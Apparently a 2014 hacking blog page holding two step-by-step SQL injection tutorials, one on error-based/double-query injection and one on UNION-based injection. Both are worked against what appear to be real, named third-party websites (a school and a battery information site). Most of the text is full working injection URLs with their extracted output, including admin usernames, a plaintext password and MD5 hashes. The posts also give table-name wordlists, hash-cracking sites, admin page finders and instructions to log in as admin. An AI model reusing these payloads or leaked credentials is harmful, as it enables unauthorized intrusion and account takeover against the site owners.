Tuesday 20 May 2014

DOUBLE QUERY SQL INJECTION



DOUBLE QUERY BASED SQL INJECTION




Difficulty: Intermediate Level 2 and Advanced
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)


Alright I'll make this tutorial as short as possible so that you can understand faster.

Understanding Error Based/Double Query

How does Error Base and Double Query work
Error Based:
Code:
A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information


Double Query:
Code:
Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it


I'll explain further in this tutorial
Anyways, focus on this part of this tutorial

Error Based IS Double Query
Error Based = Double Query (Error based 2x)

How do you know you should use Error Based/Double Query? (Important!)

This is the most important part of web hacking; the type of injection to use in different situations
You can use Error Based/ Double Query Injections in the following errors you get
Code:
a. The Used Select Statements Have  Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c.Error #1604


Now take note of those errors. You'll be needing it

Lets start with Error Based SQL injection

Alright for this lesson, we'll use this site as an example:
http://www.aliqbalschools.org

First approach is knowing the version of the database

To do that we enter this query after the end of the URL
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

So the site will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Results:
[Image: TIqze.png]

Now that we know the version of the database which is 5, lets move to the next step



Second step: Getting the database name


To get the database, we enter this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1
Now our website address will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:

Database is : iqbal_iqbal

Second step is done where we extract the database names we need.
MAKE sure you write the database name on a paper or notepad
We'll need it later

Third Step: Getting the TABLE NAMES

Table names is what we need now
Here's the query we can use:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Don't also forget the LIMIT function we used here to get table names one by one

Alright our web address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now here's the important part:

When you search for tables keep incrementing the limit until you find the valuable table name
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from
Here's the formula: LIMIT N,1 where N is a random integer

Valuable Tables can be:
Code:
Users
Admin
user
administrator
tbladmin
tblusers
settings


In this case, we have the table "settings"
So now we know our table, lets move on to the next step

Fourth Step: Getting Columns from specific TABLE NAMES

Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
So here's how a column query extraction will look like:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX
You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look like along with the query
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:
Code:
Duplicate entry 'Id~1' for key 'group_key

Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Column name= passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
[Image: kNbNI.png]
Again, don't forget to see the LIMIT Function
Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password

Fifth Step: Extracting the data from Columns


Alright this part is probably the best in SQL injecting site.
Time to get the info from the columns we have
To do that, use this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Now before you proceed, watch and focus on the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2.Databasename: where you insert the current database name of the website so that you'll be extract info from it
3. TABLENAME: where you insert the table name of the column names you extracted from
4. LIMIT N,1: LIMIT Function and N where N is a random integer
Now lets do some replacing, FOCUS
Code:
COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"


After you're done with altering the code to your needs of extracting information, time to execute it
Here's what the code will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Code:
Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key
[Image: PTqli.png]
SUCCESS, you injected the site with error based now you have the login info
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash

Now Lets Start with DOUBLE Query SQL Injection
So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query
First off, the definition so that you can understand:

Code:
Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.

Differences:
Error Based Query for Database Extraction:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Double Query for Database Extraction:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Now you get the idea, lets cut to the chase and go on
We'll be using the same site as above

Step1: Getting the database version

Alright same as Error Based, here's the Double query:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

So our Address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.

Results after query execution:
Code:
Duplicate entry '~'5.1.56-log'~1' for key 'group_key


Database version is 5
You can test on the site now if you want so that you won't get confused

Step2: Getting the Database

Now we've got the version, lets execute a double query on extracting the database
Query for Database extraction:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Notice the LIMIT Function again and make sure you don't make mistakes in that
It shows that
Limit N,1 where N is a random integer. Example: Limit 0,1
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Once more, don't forget about the LIMIT Function

So here's the results:
Code:
iqbal_iqbal


Now that's their database.
Note it down on a notepad or a paper

Step3: Getting the Table Names

As I've explained above, we'll be also using the LIMIT Function in this query.
Just a quick look, the query will look like this:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Alright you need to focus on the code and see the changes.
There are two variables here:
1. Hex_code_databasename
2. LIMIT Function

Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
Now that you've the database into hex, lets see what our address will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

LIMIT 19,1 brings us the valuable table which is "settings"
Review the code and study it

Step4: Getting Column names from specific Tables and Database
Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction
Here's what the query will look like:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now here we have 3 variables:
1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)
2. Hex code of tablename: Hex the table name which is "settings"
3. LIMIT Function
Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.

Here's what the address is gonna look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the hexed variables and the LIMIT Function
Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"
Review what we have just done for less confusion

Step5: Getting the Data from the Columns with the help of Table name and Database name

Alright now that we know what we need to extract, lets get our goods
As far as what we're injected in the site, this is our information:
database name: iqbal_iqbal
table name: settings
column names: userName, passWord

Here's what the query will look like first (for extracting data):
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Variables:
table_name.column_name: Input the table name and column name you want to extract information from

database_name.table_name: Input the database name and table name you want to extract information from

LIMIT Function: Increment until you find the data you need

So here's what our address is gonna look like when we extract details from userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Code:
admim

Query for extracting details from passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Output:
Code:
86f574c1d63d53fa804c13c3213953d9

Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9

Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.

Hope it helped you guys understand the concept of Error Based/Double Query SQL injection
End of Chapter 4
Upcoming Chapter: Detailed String Based SQL injection
Have a great day

Posted by at No comments:

UNION BASED NORMAL SQL INJECTION








Difficulty: Basic Level 2 and Intermediate

Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 25-30 min (reading thoroughly will help you understand better)
The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we're gonna learn today.
Previous tutorial: Bypassing Login Pages with SQL injection (Basics and Intermediate)
There are many types of SQL injection when it comes to web hacking
What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.
However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page

Common Types of SQL injection are:

Code:
UNION Based SQL injection
String Based SQL injection
Error Based SQL injection
Double Query SQL injection
Blind SQL injection
MsSQL injection


What we are going to learn today is what we call UNION Based SQL injection
Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
Lets just say that our website will look like this :
"http://www.site.com/index.php?id=5"
Notice at the end of the URL, "id=5"
This is what the query will look like
PHP Code:
SELECT FROM index
WHERE id 
Alright, now you know a bit of how the website works, let's get hacking

Step1: Finding the vulnerability in a website


It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a randominteger (number) or string (word).
Alright now to find sites vulnerable to SQLi is using Google Dorks.
If you don't know how to use dorks, visit Part 1 of this project to learn all about them
Once you've found a site vulnerable to SQLi, it's time to execute queries.
For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.

Try browsing the website and see if you can find links like "index.php?id=xxx"
It can be anything like "details.php?id=xxx" or "gallery.php?id="
Just find an address with a number at the end of the URL
Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"

Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
So it'll look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'

Now you'll notice an error saying
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


Spoiler (Click to View)This shows that the website is vulnerable to SQL injection.
How is this possible?
Look at the query when we added a quote " ' "
PHP Code:
SELECT FROM article
WHERE id 


Notice that, their database never stored "id = 5 ' "
This is why they return an error result
Now that we know the website is vulnerable to SQL injection, let's advance to the next process

Step2: Finding the number of columns a website has


This is the part where most people had commonly misunderstood.
To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
Alright lets get started.
The query we'll be using is "order by X--" where "X" is a random integer (number)
Start by entering "order by 25--"
Enter it at the end of the URL, so it'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--
Error, there are no 25 columns, so it'll be less than 25

Now lets try "order by 20--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--
Still Error, so there are less than 20 columns

How about we go down a bit to "order by 5--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--


aha! No errors. So let's see if there are more than 5 columns

Now lets go up to "order by 11--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--


Hmm, no errors I see. So it's obvious that there could be more than 11 columns

See if we can increase to "order by 12--"
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
Error! So this means the last number that returned no error is 11
Therefore, the website has 11 columns

Tips:

An error while scanning for number of columns will look like this

Spoiler (Click to View)While No errors will show the page as normal

Step3: 

Now that we found the number of Columns, time to Execute the UNION SELECT statement

First off, we need to know what does "UNION SELECT" means
Lets say we have 2 tables, "users" and "admin"
Basically, UNION SELECT is a statement where all these information will be collected as one.
Look at this query
PHP Code:
SELECT FROM users
UNION SELECT FROM admin 


If we perform the UNION SELECT statement, we can get both users and admin information from their database
The point is that, UNION SELECT returns our results with the information we need
If you want to find vulnerable columns, use UNION SELECT
If you want to find version of database, UNION SELECT
If you want admin information! use UNION SELECT
Alright, now that we know something about the Union function, lets continue.

Take our website that has 11 columns and add a "UNION SELECT" statement.
Here's how our query will look like
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--


This is what you would normally do if you use UNION function while SQL injecting a website

Focus on something like this, "index.php?id=-X UNION SELECT N--"
Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"

Step4: Random numbers appear on screen, the next step

Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.
Here's how it'll look like:

Spoiler (Click to View)You need to inject the number at the very top (always at the very top)
So, in this case we have number "8"
Now you might be asking, what can I do with a vulnerable column?
Well here's what you can get-- INFORMATION!
You need a lot of information to study from the website, here are a couple of examples.

Replace the vulnerable column i.e number 8 with a statement
Statements:
Code:
@@version, version()
database(),
user(),
@@hostname
@@datadir



Their functions

@@version/version() = find the version of the database
database() = find the current database
user() = find the user information
@@hostname = Current hosting info
@@datadir = directory of the data of the website

To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
It'll look like this
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--


Results:
Code:
5.1.52-log


So the database version is 5, which is good because it'll be easier to SQL inject the website.

Note:

Database version less than 5 "<5" = you need to guess tables (a bit hard work)
Database version greater than 5 ">5" = easy to inject with another function i.e group_concat
If you ever want to SQLi a website with version <5, then you can guess the tables with the following below
Code:
user
username
usernames
admin
admins
users
manager
account
accounts
member
login
logins
members
tbl_user
tbl_users
tbl_admin
tbl_admins
tbl_member
tbl_members
tbladmins
memberlist
tbluser
tblusers
tblmanager
tblmanagers
tblclients
tblservers
adminuser
usertbl
userstbl
admintbl
adminstbl
id
tuser
tusers
uid
userid
user_id
auid
adminpass
LoginID
FirstName
LastName
cms_user
cms_member
cms_users
cms_members
cms_admin
cms_admins
user_admin
user_info
user_list
user_login
user_logins
user_names
userrights
userinfo
userlist
webadmin
webadmins
Webmaster
Webuser
product
products
tblproducts
tblproduct
tbl_tbadmin
Adminlogin


We'll be knowing how to get the tables in the next step.
But for now, let's see what we can get with other statements
Lets try all statements at once shall we
The URL will look like this,
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@datadir,@@hostname,user()),9,1​0,11--



Results:

Code:
32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.myregisteredsite.com32908_user116602@lnh-www1h.bluehalo.myregisteredsite.com
3



We have almost every information we have about the website
Look close here, we used a command "group_concat"
Here's its function:
Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
Note:Group_concat won't work with versions less than 5

Step5:Getting the table names

What are tables?
Tables contain columns and columns contain the data
It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
Alright, first lets look up some functions we're gonna use to extract table names (Important)
Code:
group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order
Now lets combine those functions and make up a query that will give us the table names
So, here's what our link will look like:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,11 from information_schema.tables where table_schema=database()--


In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
and then we added a
"from information_schema.tables where table_schema=database()--"
after the last column (excluding the two hyphens after 11)
Results on table names:
Code:
pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews

Alright now that we've found the tables, what you're gonna have to do is
that, you have to find tables where user/admin information are stored
In this case, "tbladmin" seems to be having an admin information stored in it.
It's all about predicting and expecting what's behind every table you see
Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
Replace and Add the following
Vulnerable Column = replace with "group_concat(table_name,0x0a)"
After the last column = Add "from information_schema.tables where table_schema=database()--"
Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string


Step6:Getting Columns from Tables


Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
To do this, we're gonna have to alter some queries a bit
Now look closely at this syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--


Here's what we replaced:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x74626c61646d696e--"
Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
First of all, these are known as Hex
To make a Hex readable, we put "0x" at the beginning
I'll explain this briefly. So our table name was "tbladmin"
To enter that table using the syntax above, we have to convert that table name to Hex
In order to do that, visit this website:
http://www.swingnote.com/tools/texttohex.php
It's a text to hex converter
Enter "tbladmin" in the text box and hit convert
You'll notice the results will be "74626c61646d696e" (that's the hex)
Now to make it readable to the website, add "0x" at the beginning
So it will be:
Code:
0x74626c61646d696e

Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)
Code:
group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex


Results after extracting column names from tables:
Code:
adminid ,username ,password ,dom


Now that we've got the columns from that table, it's time to extract the information.
What we're gonna need here is obviously only the "username" and "password"

Step7:Getting Data from Columns

Alright, lets extract the information
Look closely at the syntax:
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x0a),9,10,11 from tbladmin--


Keep this formula-like syntax in your mind whenever you want to extract data from columns
Code:
http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--


Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extra

Now for revising,
column names = username, password
separator = 0x3a (a hex for a colon " : ")
table name = tbladmin
Once you execute that syntax, you get the username and password separated by a colonResults after executing the syntax:
Code:
spid3r:spid3r123
Username: spid3r
Password: spid3r123

Special cases: Hashed Usernames and Passwords

Most websites will have their passwords hashed as MD5
In this case you'll need to crack them.
Using some websites will help you
Here's a list of Hash cracking websites:
Code:
www.md5decrypter.co.uk/
www.md5this.com/
www.md5crack.com/
http://hashchecker.de/find.html


An MD5 Hash will look like this:
Code:
21232f297a57a5a743894a0e4a801fc3 -- 32 characters

A SHA-1 Hash will look like this:
Code:
d033e22ae348aeb5660fc2140aec35850c4da997 -- 40 characters

Last Step: Finding the admin page and logging in for the goods


Alright, now that we have our admin login info
Username: spid3r
Password: ispid3r123
It's time to find the login pages
To do this, you can use Admin Page Finders
Here's some you can use
>>Scorpion Admin Page Finder<<
http://sc0rpion.ir/af/
>>Outlaw Admin Page Finder<<
http://www.tools.th3-0utl4ws.com/admin-finder/
>>Napsterakos Admin Page Finder<<
http://www.hackforums.net/showthread.php...ight=HaviJ
>>HaviJ Injector/Cracker and Admin page finder<<
http://www.hackforums.net/showthread.php...age+finder
Alright after scanning the website for admin pages, you should see something like this:
Code:
http://www.leadacidbatteryinfo.org/admin/


Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
However, some websites could be already hacked and messed up
Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
These are just the basics of SQL injection.
There are lots of websites to hack and more to practice with.
Just so that you'll get a clear view of this tutorial, look up a demonstration video on how I inject a site with UNION Based/Normal SQL injection:

Extras:Acunetix Web Vulnerability Scanner:
Features: Scans a specific website of your choice for vulnerabilities and directories too
Download it by clicking here

SQL Poizon:
Scans for dorks, crawls a lot of websites at a time, organized work space for SQL injection, and a built-in browser
http://www.hackforums.net/showthread.php...SQL+poizon

SQL injection vulnerable lists:
Lists by iTz Ryannn x
http://pastebin.com/y2jD5Fgz

Lists made by Dyme
http://pastebin.com/kVMYX0Eh
Thanks for reading this tutorial and I hope you enjoyed and learn a lot from it
End of Chapter 3
Upcoming chapter: Error Based SQL injection Detailed
Have a great day 
Posted by at No comments:
Subscribe to: Posts (Atom)